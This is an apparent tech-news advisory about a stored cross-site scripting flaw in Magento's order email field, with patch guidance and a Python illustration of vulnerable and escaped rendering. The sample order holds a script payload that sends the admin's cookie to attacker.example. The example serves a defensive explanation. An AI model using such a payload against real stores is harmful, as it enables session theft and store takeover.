Update your Magento online store before someone checks out your data

A bug in the popular Magento ecommerce software gave attackers practically free rein over online stores, so make sure yours has been patched.

Web security company Sucuri discovered and reported the bug last November, and Magento released a patch at the end of last week.

The problem, roughly speaking, was that the order template did not sanitise what was supposed to be the customer's email address, so an attacker could put JavaScript in that field when placing an order. The script was then executed in the browser of any admin user who examined the order in the administration panel, with that administrator's privileges (a stored cross-site scripting flaw).
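
The mechanism above, modelled as an added example in Python (this is not Magento's own code, which is PHP, and the order data, field names and attacker host are constructed for illustration): an order view that interpolates the untrusted "email" field straight into admin-panel HTML, the same view with output escaping, and a conservative server-side address check that refuses input carrying markup.

```python
"""Illustration of a stored XSS via an order's email field (added example,
not Magento code). The sample orders and the attacker.example host are
constructed for the demo."""
import html
import re

# Constructed sample orders. The "email" of the malicious one is a script
# payload that exfiltrates the viewing admin's cookie, not a real address.
MALICIOUS_ORDER = {
    "id": 100000123,
    "email": '"><script>document.location="http://attacker.example/?c="'
             '+document.cookie</script>',
}
BENIGN_ORDER = {"id": 100000124, "email": "alice@example.com"}


def render_order_vulnerable(order):
    """Mirrors the bug: the stored value is dropped into the admin page as-is,
    so a payload in the email field becomes live HTML for whoever opens it."""
    return (f'<tr><td>{order["id"]}</td>'
            f'<td><a href="mailto:{order["email"]}">{order["email"]}</a></td></tr>')


def render_order_escaped(order):
    """Output-time fix: every untrusted value is HTML-escaped, with quotes
    escaped too because the same value lands inside an attribute."""
    email = html.escape(order["email"], quote=True)
    return (f'<tr><td>{int(order["id"])}</td>'
            f'<td><a href="mailto:{email}">{email}</a></td></tr>')


# Deliberately narrower than RFC 5322: no quoted local parts, no angle
# brackets, no whitespace. That shape has no room for markup.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def email_is_acceptable(addr):
    """Input-time defence: accept only a conservative address shape."""
    return bool(EMAIL_RE.match(addr))


def contains_live_script(rendered):
    """Demo check: does the rendered HTML still contain an unescaped <script tag?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for order in (MALICIOUS_ORDER, BENIGN_ORDER):
        print("vulnerable :", render_order_vulnerable(order))
        print("escaped    :", render_order_escaped(order))
        print("acceptable :", email_is_acceptable(order["email"]))
```

The escaped renderer is the fix that matters: validation at the checkout form is worth having, but any other path that writes an order (an API, an import, an admin edit) would bypass it, whereas escaping at the point of output protects the admin page regardless of how the value got into the database.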

While Sucuri has so far published only a harmless demonstration of the way this works, the company says it "could be used by attackers to take over your site, create new administrator accounts, steal client information, anything a legitimate administrator account is allowed to do."

The company warned that this issue affects almost every installation of Magento CE earlier than 1.9.2.3 and Magento EE earlier than 1.14.2.3, the releases that include the fix.

The vulnerability is now public knowledge, so if you use Magento it is important to install patch bundle SUPEE-7405 (or upgrade to a release that includes it), or to make sure that whoever looks after the technical side of your Magento-based store has done that for you. On Magento 1.x the patch scripts record what they have applied in app/etc/applied.patches.list, so an entry naming SUPEE-7405 in that file is a quick way to confirm the bundle is in place.

Source: Copyright © BIT (Business IT). All rights reserved.